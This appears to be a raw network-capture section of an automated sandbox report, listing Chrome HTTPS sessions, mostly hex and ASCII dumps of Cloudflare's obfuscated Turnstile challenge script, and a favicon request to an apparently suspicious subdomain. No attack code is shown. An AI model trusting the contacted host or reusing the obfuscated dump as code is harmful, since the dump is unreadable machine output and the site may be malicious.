                                                                                                                                                                                                                                  2024-12-18 19:27:50 UTC1369INData Raw: 29 5d 28 32 2c 66 29 2c 33 32 29 2c 65 4d 5b 67 54 28 31 30 35 32 29 5d 28 66 75 6e 63 74 69 6f 6e 28 67 55 2c 68 2c 69 2c 6b 2c 6c 2c 6d 2c 6e 29 7b 69 66 28 67 55 3d 67 54 2c 68 3d 7b 7d 2c 68 5b 67 55 28 33 39 33 29 5d 3d 67 55 28 34 35 36 29 2c 68 5b 67 55 28 37 39 35 29 5d 3d 67 55 28 35 36 30 29 2c 69 3d 68 2c 65 5b 67 55 28 34 39 33 29 5d 21 3d 3d 67 55 28 31 36 33 34 29 29 7b 66 6f 72 28 6b 3d 69 5b 67 55 28 33 39 33 29 5d 5b 67 55 28 31 33 32 33 29 5d 28 27 7c 27 29 2c 6c 3d 30 3b 21 21 5b 5d 3b 29 7b 73 77 69 74 63 68 28 6b 5b 6c 2b 2b 5d 29 7b 63 61 73 65 27 30 27 3a 4a 5b 67 55 28 31 38 31 37 29 5d 26 26 52 5b 67 55 28 31 38 31 37 29 5d 5b 67 55 28 31 33 38 36 29 5d 26 26 28 6d 3d 7b 7d 2c 6d 5b 67 55 28 38 30 34 29 5d 3d 69 5b 67 55 28 37 39
                                                                                                                                                                                                                                  Data Ascii: )](2,f),32),eM[gT(1052)](function(gU,h,i,k,l,m,n){if(gU=gT,h={},h[gU(393)]=gU(456),h[gU(795)]=gU(560),i=h,e[gU(493)]!==gU(1634)){for(k=i[gU(393)][gU(1323)]('|'),l=0;!![];){switch(k[l++]){case'0':J[gU(1817)]&&R[gU(1817)][gU(1386)]&&(m={},m[gU(804)]=i[gU(79
                                                                                                                                                                                                                                  2024-12-18 19:27:50 UTC1369INData Raw: 5b 67 56 28 35 34 34 29 5d 3d 67 56 28 31 36 38 37 29 2c 6a 5b 67 56 28 31 31 36 32 29 5d 3d 67 56 28 38 37 39 29 2c 6a 29 3b 74 72 79 7b 69 66 28 6b 5b 67 56 28 31 36 33 35 29 5d 21 3d 3d 6b 5b 67 56 28 31 36 33 35 29 5d 29 72 65 74 75 72 6e 20 73 3b 65 6c 73 65 7b 69 66 28 6c 3d 65 51 28 67 5b 67 56 28 31 33 35 34 29 5d 2c 67 5b 67 56 28 37 39 33 29 5d 29 2c 6b 5b 67 56 28 35 34 38 29 5d 28 67 5b 67 56 28 31 33 35 34 29 5d 2c 45 72 72 6f 72 29 3f 67 5b 67 56 28 31 33 35 34 29 5d 3d 4a 53 4f 4e 5b 67 56 28 39 38 35 29 5d 28 67 5b 67 56 28 31 33 35 34 29 5d 2c 4f 62 6a 65 63 74 5b 67 56 28 35 32 33 29 5d 28 67 5b 67 56 28 31 33 35 34 29 5d 29 29 3a 67 5b 67 56 28 31 33 35 34 29 5d 3d 4a 53 4f 4e 5b 67 56 28 39 38 35 29 5d 28 67 5b 67 56 28 31 33 35 34 29
                                                                                                                                                                                                                                  Data Ascii: [gV(544)]=gV(1687),j[gV(1162)]=gV(879),j);try{if(k[gV(1635)]!==k[gV(1635)])return s;else{if(l=eQ(g[gV(1354)],g[gV(793)]),k[gV(548)](g[gV(1354)],Error)?g[gV(1354)]=JSON[gV(985)](g[gV(1354)],Object[gV(523)](g[gV(1354)])):g[gV(1354)]=JSON[gV(985)](g[gV(1354)
                                                                                                                                                                                                                                  2024-12-18 19:27:50 UTC1369INData Raw: 29 7b 72 65 74 75 72 6e 20 6f 5e 6e 7d 2c 27 43 70 64 43 4c 27 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 29 7b 72 65 74 75 72 6e 20 6e 3c 6f 7d 2c 27 65 47 52 6e 67 27 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 29 7b 72 65 74 75 72 6e 20 6e 2a 6f 7d 2c 27 62 44 51 42 46 27 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 29 7b 72 65 74 75 72 6e 20 6e 3e 6f 7d 2c 27 79 4b 5a 58 42 27 3a 67 57 28 38 30 39 29 2c 27 65 6b 5a 42 42 27 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 2c 73 29 7b 72 65 74 75 72 6e 20 6e 28 6f 2c 73 29 7d 2c 27 50 6a 6c 4a 4a 27 3a 67 57 28 34 34 35 29 7d 2c 64 20 69 6e 73 74 61 6e 63 65 6f 66 20 45 72 72 6f 72 29 7b 69 66 28 28 66 3d 64 5b 67 57 28 34 31 30 29 5d 2c 64 5b 67 57 28 31 30 35 31 29 5d 26 26 74 79 70 65 6f 66 20 64 5b 67 57 28 31 30 35 31 29
                                                                                                                                                                                                                                  Data Ascii: ){return o^n},'CpdCL':function(n,o){return n<o},'eGRng':function(n,o){return n*o},'bDQBF':function(n,o){return n>o},'yKZXB':gW(809),'ekZBB':function(n,o,s){return n(o,s)},'PjlJJ':gW(445)},d instanceof Error){if((f=d[gW(410)],d[gW(1051)]&&typeof d[gW(1051)


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  8192.168.2.1649716104.18.95.414436196C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-12-18 19:27:50 UTC739OUTGET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1
                                                                                                                                                                                                                                  Host: challenges.cloudflare.com
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                                                                                                                                  Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/4r65z/0x4AAAAAAA3CjQARFbjEVtU4/auto/fbE/normal/auto/
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-12-18 19:27:50 UTC240INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Date: Wed, 18 Dec 2024 19:27:50 GMT
                                                                                                                                                                                                                                  Content-Type: image/png
                                                                                                                                                                                                                                  Content-Length: 61
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  cache-control: max-age=2629800, public
                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                  CF-RAY: 8f418d748c0543b3-EWR
                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                  2024-12-18 19:27:50 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                                                                                                  Data Ascii: PNGIHDRsIDAT$IENDB`


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  9192.168.2.1649718104.18.95.414436196C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-12-18 19:27:51 UTC385OUTGET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1
                                                                                                                                                                                                                                  Host: challenges.cloudflare.com
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-12-18 19:27:52 UTC240INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Date: Wed, 18 Dec 2024 19:27:52 GMT
                                                                                                                                                                                                                                  Content-Type: image/png
                                                                                                                                                                                                                                  Content-Length: 61
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  cache-control: max-age=2629800, public
                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                  CF-RAY: 8f418d7efa0a429d-EWR
                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                  2024-12-18 19:27:52 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                                                                                                  Data Ascii: PNGIHDRsIDAT$IENDB`


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  10192.168.2.1649719104.18.95.414436196C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-12-18 19:27:52 UTC433OUTGET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8f418d689add32ca&lang=auto HTTP/1.1
                                                                                                                                                                                                                                  Host: challenges.cloudflare.com
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-12-18 19:27:52 UTC331INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Date: Wed, 18 Dec 2024 19:27:52 GMT
                                                                                                                                                                                                                                  Content-Type: application/javascript; charset=UTF-8
                                                                                                                                                                                                                                  Content-Length: 118038
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                  CF-RAY: 8f418d820eee7cab-EWR
                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                  2024-12-18 19:27:52 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 53 79 57 4f 55 33 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 70 72 69 76 61 63 79 5f 6c 69 6e 6b 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 70 72 69 76 61 63 79 70 6f 6c 69 63 79 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 74 65 72 6d 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 77 65 62 73 69 74 65 2d 74 65 72 6d 73 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70
                                                                                                                                                                                                                                  Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.SyWOU3={"metadata":{"challenge.privacy_link":"https%3A%2F%2Fwww.cloudflare.com%2Fprivacypolicy%2F","challenge.terms":"https%3A%2F%2Fwww.cloudflare.com%2Fwebsite-terms%2F","challenge.supported_browsers":"http
                                                                                                                                                                                                                                  2024-12-18 19:27:52 UTC1369INData Raw: 22 54 69 6d 65 64 25 32 30 6f 75 74 22 2c 22 68 75 6d 61 6e 5f 62 75 74 74 6f 6e 5f 74 65 78 74 22 3a 22 56 65 72 69 66 79 25 32 30 79 6f 75 25 32 30 61 72 65 25 32 30 68 75 6d 61 6e 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 69 66 72 61 6d 65 5f 61 6c 74 22 3a 22 57 69 64 67 65 74 25 32 30 63 6f 6e 74 61 69 6e 69 6e 67 25 32 30 61 25 32 30 43 6c 6f 75 64 66 6c 61 72 65 25 32 30 73 65 63 75 72 69 74 79 25 32 30 63 68 61 6c 6c 65 6e 67 65 22 2c 22 69 6e 76 61 6c 69 64 5f 64 6f 6d 61 69 6e 22 3a 22 49 6e 76 61 6c 69 64 25 32 30 64 6f 6d 61 69 6e 2e 25 32 30 43 6f 6e 74 61 63 74 25 32 30 74 68 65 25 32 30 53 69 74 65 25 32 30 41 64 6d 69 6e 69 73 74 72 61 74 6f 72 25 32 30 69 66 25 32 30 74 68 69 73 25 32 30 70 72 6f 62 6c 65 6d 25 32 30 70 65 72 73 69 73 74 73
                                                                                                                                                                                                                                  Data Ascii: "Timed%20out","human_button_text":"Verify%20you%20are%20human","turnstile_iframe_alt":"Widget%20containing%20a%20Cloudflare%20security%20challenge","invalid_domain":"Invalid%20domain.%20Contact%20the%20Site%20Administrator%20if%20this%20problem%20persists
                                                                                                                                                                                                                                  2024-12-18 19:27:52 UTC1369INData Raw: 2c 67 6c 2c 67 6d 2c 67 71 2c 67 72 2c 67 73 2c 67 77 2c 67 78 2c 67 45 2c 65 4f 2c 65 50 29 7b 66 6f 72 28 67 4a 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 2c 67 49 2c 65 2c 66 29 7b 66 6f 72 28 67 49 3d 62 2c 65 3d 63 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 66 3d 2d 70 61 72 73 65 49 6e 74 28 67 49 28 39 37 36 29 29 2f 31 2b 70 61 72 73 65 49 6e 74 28 67 49 28 35 35 32 29 29 2f 32 2b 70 61 72 73 65 49 6e 74 28 67 49 28 34 39 37 29 29 2f 33 2a 28 70 61 72 73 65 49 6e 74 28 67 49 28 33 39 33 29 29 2f 34 29 2b 70 61 72 73 65 49 6e 74 28 67 49 28 33 34 38 29 29 2f 35 2b 70 61 72 73 65 49 6e 74 28 67 49 28 31 37 37 34 29 29 2f 36 2a 28 70 61 72 73 65 49 6e 74 28 67 49 28 36 33 32 29 29 2f 37 29 2b 70 61 72 73 65 49 6e 74 28 67 49 28 35 35 33 29 29
                                                                                                                                                                                                                                  Data Ascii: ,gl,gm,gq,gr,gs,gw,gx,gE,eO,eP){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=-parseInt(gI(976))/1+parseInt(gI(552))/2+parseInt(gI(497))/3*(parseInt(gI(393))/4)+parseInt(gI(348))/5+parseInt(gI(1774))/6*(parseInt(gI(632))/7)+parseInt(gI(553))
                                                                                                                                                                                                                                  2024-12-18 19:27:52 UTC1369INData Raw: 6c 28 31 34 37 32 29 5d 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 31 27 3a 6f 3d 68 6c 28 31 35 30 37 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 32 27 3a 43 5b 68 6c 28 33 36 32 29 5d 28 68 6c 28 31 32 31 32 29 2c 68 6c 28 31 37 30 35 29 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 33 27 3a 43 5b 68 6c 28 31 33 32 30 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 34 27 3a 73 3d 67 6d 5b 68 6c 28 31 36 35 33 29 5d 28 45 29 5b 68 6c 28 38 32 33 29 5d 28 27 2b 27 2c 68 6c 28 31 31 35 35 29 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 35 27 3a 43 5b 68 6c 28 34 31 38 29 5d 28 6f 2c 78 2c 21 21 5b 5d 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 36 27 3a 78 3d 6b 5b 68 6c 28 34 33 37 29 5d 28 6b 5b
                                                                                                                                                                                                                                  Data Ascii: l(1472)]);continue;case'1':o=hl(1507);continue;case'2':C[hl(362)](hl(1212),hl(1705));continue;case'3':C[hl(1320)]=function(){};continue;case'4':s=gm[hl(1653)](E)[hl(823)]('+',hl(1155));continue;case'5':C[hl(418)](o,x,!![]);continue;case'6':x=k[hl(437)](k[
                                                                                                                                                                                                                                  2024-12-18 19:27:52 UTC1369INData Raw: 32 29 5d 3d 3d 3d 65 5b 68 6d 28 38 37 35 29 5d 29 26 26 28 6a 3d 64 5b 68 6d 28 37 39 32 29 5d 5b 68 6d 28 31 31 35 30 29 5d 28 27 5c 6e 27 29 2c 6a 5b 68 6d 28 37 32 34 29 5d 3e 31 29 26 26 28 6b 3d 2f 5e 5c 73 2a 61 74 5c 73 2b 28 2e 2b 29 3a 28 5c 64 2b 29 3a 28 5c 64 2b 29 2f 2c 6c 3d 6a 5b 31 5d 5b 68 6d 28 31 37 35 30 29 5d 28 6b 29 2c 6c 26 26 28 67 3d 6c 5b 31 5d 2c 68 3d 65 5b 68 6d 28 39 33 33 29 5d 28 70 61 72 73 65 49 6e 74 2c 6c 5b 32 5d 2c 31 30 29 2c 69 3d 70 61 72 73 65 49 6e 74 28 6c 5b 33 5d 2c 31 30 29 29 29 3a 66 3d 4a 53 4f 4e 5b 68 6d 28 36 33 38 29 5d 28 64 29 3b 72 65 74 75 72 6e 20 6d 3d 7b 7d 2c 6d 5b 68 6d 28 31 31 39 31 29 5d 3d 66 2c 6d 5b 68 6d 28 31 34 37 32 29 5d 3d 67 2c 6d 5b 68 6d 28 31 36 39 30 29 5d 3d 68 2c 6d 5b 68
                                                                                                                                                                                                                                  Data Ascii: 2)]===e[hm(875)])&&(j=d[hm(792)][hm(1150)]('\n'),j[hm(724)]>1)&&(k=/^\s*at\s+(.+):(\d+):(\d+)/,l=j[1][hm(1750)](k),l&&(g=l[1],h=e[hm(933)](parseInt,l[2],10),i=parseInt(l[3],10))):f=JSON[hm(638)](d);return m={},m[hm(1191)]=f,m[hm(1472)]=g,m[hm(1690)]=h,m[h
                                                                                                                                                                                                                                  2024-12-18 19:27:52 UTC1369INData Raw: 6d 3d 7b 7d 2c 66 6d 5b 67 4a 28 34 32 33 29 5d 3d 66 6c 2c 65 4d 5b 67 4a 28 31 32 33 33 29 5d 3d 66 6d 2c 66 6f 3d 65 4d 5b 67 4a 28 31 30 31 33 29 5d 5b 67 4a 28 38 39 38 29 5d 5b 67 4a 28 31 37 33 37 29 5d 2c 66 70 3d 65 4d 5b 67 4a 28 31 30 31 33 29 5d 5b 67 4a 28 38 39 38 29 5d 5b 67 4a 28 36 31 32 29 5d 2c 66 71 3d 65 4d 5b 67 4a 28 31 30 31 33 29 5d 5b 67 4a 28 38 39 38 29 5d 5b 67 4a 28 37 39 39 29 5d 2c 66 43 3d 21 5b 5d 2c 66 4f 3d 75 6e 64 65 66 69 6e 65 64 2c 65 4d 5b 67 4a 28 39 33 34 29 5d 28 67 4a 28 31 34 33 32 29 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 69 62 2c 64 2c 65 29 7b 69 62 3d 67 4a 2c 64 3d 7b 27 64 78 57 65 66 27 3a 66 75 6e 63 74 69 6f 6e 28 66 2c 67 29 7b 72 65 74 75 72 6e 20 66 3d 3d 3d 67 7d 2c 27 55 4f 56 6b 75 27 3a 66 75 6e
                                                                                                                                                                                                                                  Data Ascii: m={},fm[gJ(423)]=fl,eM[gJ(1233)]=fm,fo=eM[gJ(1013)][gJ(898)][gJ(1737)],fp=eM[gJ(1013)][gJ(898)][gJ(612)],fq=eM[gJ(1013)][gJ(898)][gJ(799)],fC=![],fO=undefined,eM[gJ(934)](gJ(1432),function(c,ib,d,e){ib=gJ,d={'dxWef':function(f,g){return f===g},'UOVku':fun
                                                                                                                                                                                                                                  2024-12-18 19:27:52 UTC1369INData Raw: 67 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 3d 3d 3d 68 7d 2c 27 62 56 49 65 53 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 3d 3d 68 7d 2c 27 50 6e 79 45 57 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 65 6a 5a 69 41 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3e 69 7d 2c 27 56 56 4d 71 53 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 7c 69 7d 2c 27 67 53 70 68 54 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 3c 69 7d 2c 27 63 51 58 68 77 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 26 69 7d 2c 27 76 6d 51 42 57 27 3a 66 75 6e 63 74 69 6f 6e 28
                                                                                                                                                                                                                                  Data Ascii: g':function(h,i){return i===h},'bVIeS':function(h,i){return i==h},'PnyEW':function(h,i){return h(i)},'ejZiA':function(h,i){return h>i},'VVMqS':function(h,i){return h|i},'gSphT':function(h,i){return h<<i},'cQXhw':function(h,i){return h&i},'vmQBW':function(
                                                                                                                                                                                                                                  2024-12-18 19:27:52 UTC1369INData Raw: 4f 3d 69 4e 2c 64 5b 69 4f 28 31 34 30 34 29 5d 28 6e 75 6c 6c 2c 68 29 3f 27 27 3a 66 2e 67 28 68 2c 36 2c 66 75 6e 63 74 69 6f 6e 28 69 2c 69 50 29 7b 72 65 74 75 72 6e 20 69 50 3d 69 4f 2c 69 50 28 34 31 35 29 5b 69 50 28 31 32 39 33 29 5d 28 69 29 7d 29 7d 2c 27 67 27 3a 66 75 6e 63 74 69 6f 6e 28 69 2c 6a 2c 6f 2c 69 51 2c 73 2c 78 2c 42 2c 43 2c 44 2c 45 2c 46 2c 47 2c 48 2c 49 2c 4a 2c 4b 2c 53 2c 54 2c 55 2c 56 2c 57 2c 58 2c 59 2c 4c 2c 4d 2c 4e 2c 50 29 7b 69 66 28 69 51 3d 69 4e 2c 73 3d 7b 27 42 72 5a 61 50 27 3a 69 51 28 31 35 31 35 29 2c 27 6c 66 53 61 51 27 3a 66 75 6e 63 74 69 6f 6e 28 4f 2c 50 2c 69 52 29 7b 72 65 74 75 72 6e 20 69 52 3d 69 51 2c 64 5b 69 52 28 31 30 32 35 29 5d 28 4f 2c 50 29 7d 2c 27 72 7a 64 71 48 27 3a 69 51 28 31 33
                                                                                                                                                                                                                                  Data Ascii: O=iN,d[iO(1404)](null,h)?'':f.g(h,6,function(i,iP){return iP=iO,iP(415)[iP(1293)](i)})},'g':function(i,j,o,iQ,s,x,B,C,D,E,F,G,H,I,J,K,S,T,U,V,W,X,Y,L,M,N,P){if(iQ=iN,s={'BrZaP':iQ(1515),'lfSaQ':function(O,P,iR){return iR=iQ,d[iR(1025)](O,P)},'rzdqH':iQ(13
                                                                                                                                                                                                                                  2024-12-18 19:27:52 UTC1369INData Raw: 32 2c 47 29 2c 47 2b 2b 29 2c 64 65 6c 65 74 65 20 43 5b 44 5d 7d 65 6c 73 65 20 66 6f 72 28 4e 3d 42 5b 44 5d 2c 78 3d 30 3b 64 5b 69 51 28 31 36 36 37 29 5d 28 78 2c 47 29 3b 49 3d 49 3c 3c 31 7c 64 5b 69 51 28 38 31 39 29 5d 28 4e 2c 31 29 2c 64 5b 69 51 28 31 34 34 39 29 5d 28 4a 2c 6a 2d 31 29 3f 28 4a 3d 30 2c 48 5b 69 51 28 31 33 30 37 29 5d 28 6f 28 49 29 29 2c 49 3d 30 29 3a 4a 2b 2b 2c 4e 3e 3e 3d 31 2c 78 2b 2b 29 3b 44 3d 28 45 2d 2d 2c 45 3d 3d 30 26 26 28 45 3d 4d 61 74 68 5b 69 51 28 31 35 39 34 29 5d 28 32 2c 47 29 2c 47 2b 2b 29 2c 42 5b 4d 5d 3d 46 2b 2b 2c 64 5b 69 51 28 35 33 32 29 5d 28 53 74 72 69 6e 67 2c 4c 29 29 7d 7d 65 6c 73 65 7b 66 6f 72 28 50 3d 5b 5d 3b 6e 75 6c 6c 21 3d 3d 69 3b 50 3d 50 5b 69 51 28 38 39 37 29 5d 28 6a 5b
                                                                                                                                                                                                                                  Data Ascii: 2,G),G++),delete C[D]}else for(N=B[D],x=0;d[iQ(1667)](x,G);I=I<<1|d[iQ(819)](N,1),d[iQ(1449)](J,j-1)?(J=0,H[iQ(1307)](o(I)),I=0):J++,N>>=1,x++);D=(E--,E==0&&(E=Math[iQ(1594)](2,G),G++),B[M]=F++,d[iQ(532)](String,L))}}else{for(P=[];null!==i;P=P[iQ(897)](j[
                                                                                                                                                                                                                                  2024-12-18 19:27:52 UTC1369INData Raw: 38 29 2c 73 5b 69 51 28 35 37 33 29 5d 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 31 34 27 3a 58 5b 69 51 28 31 33 31 35 29 5d 28 55 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 31 35 27 3a 55 5b 69 51 28 31 35 39 33 29 5d 3d 73 5b 69 51 28 31 35 38 36 29 5d 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 31 36 27 3a 57 5b 69 51 28 31 37 35 38 29 5d 3d 69 51 28 31 37 31 36 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 31 37 27 3a 58 5b 69 51 28 31 33 31 35 29 5d 28 56 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 31 38 27 3a 78 3d 42 5b 69 51 28 31 33 30 36 29 5d 28 69 51 28 36 38 35 29 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 31 39 27 3a 72 65 74 75 72 6e 20 55 3b 63 61 73 65 27 32 30 27 3a 4b 5b 69 51 28 31 33 31 35 29 5d 28 58 29 3b 63
                                                                                                                                                                                                                                  Data Ascii: 8),s[iQ(573)]);continue;case'14':X[iQ(1315)](U);continue;case'15':U[iQ(1593)]=s[iQ(1586)];continue;case'16':W[iQ(1758)]=iQ(1716);continue;case'17':X[iQ(1315)](V);continue;case'18':x=B[iQ(1306)](iQ(685));continue;case'19':return U;case'20':K[iQ(1315)](X);c


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  11192.168.2.1649720192.185.195.2144436196C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-12-18 19:27:52 UTC614OUTGET /favicon.ico HTTP/1.1
                                                                                                                                                                                                                                  Host: 52kz793.afratradingagency.com
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                                                                                                                                  Referer: https://52kz793.afratradingagency.com/
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-12-18 19:27:52 UTC263INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                  Date: Wed, 18 Dec 2024 19:27:52 GMT
                                                                                                                                                                                                                                  Server: Apache
                                                                                                                                                                                                                                  Upgrade: h2,h2c
                                                                                                                                                                                                                                  Connection: Upgrade, close
                                                                                                                                                                                                                                  Last-Modified: Fri, 30 Sep 2022 11:49:49 GMT
                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                  Content-Length: 11816
                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                  Content-Type: text/html
